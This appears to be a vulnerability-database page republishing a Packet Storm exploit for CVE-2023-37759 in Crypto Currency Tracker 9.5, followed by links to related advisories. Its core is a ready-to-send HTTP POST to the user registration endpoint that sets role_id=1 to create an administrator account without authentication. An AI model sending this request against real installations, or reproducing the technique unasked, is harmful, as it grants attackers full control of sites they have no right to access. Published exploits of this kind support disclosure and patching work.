Lucene search
0xBrPACKETSTORM:174240HistoryAug 21, 2023 - 12:00 a.m.
Crypto Currency Tracker (CCT) 9.5 Add Administrator
2023-08-2100:00:00
0xBr
packetstormsecurity.com
134
crypto currency tracker
admin account creation
unauthenticated
cve-2023-37759
laravel
exploit
security
0.078 Low
EPSS
Percentile
94.3%
`# Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)
# Date: 11.08.2023
# Exploit Author: 0xBr
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008
# Version: <=9.5
# CVE: CVE-2023-37759
POST /en/user/register HTTP/2
Host: localhost
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 756
_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register
`
Related
prion
prion
Improper access control
2023-09-08 03:15:00
cvelist
cvelist
CVE-2023-37759
2023-09-08 00:00:00
nvd
nvd
CVE-2023-37759
2023-09-08 03:15:08
zdt
zdt
cve
cve
CVE-2023-37759
2023-09-08 03:15:08
exploitdb
exploitdb
Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)
2023-08-21 00:00:00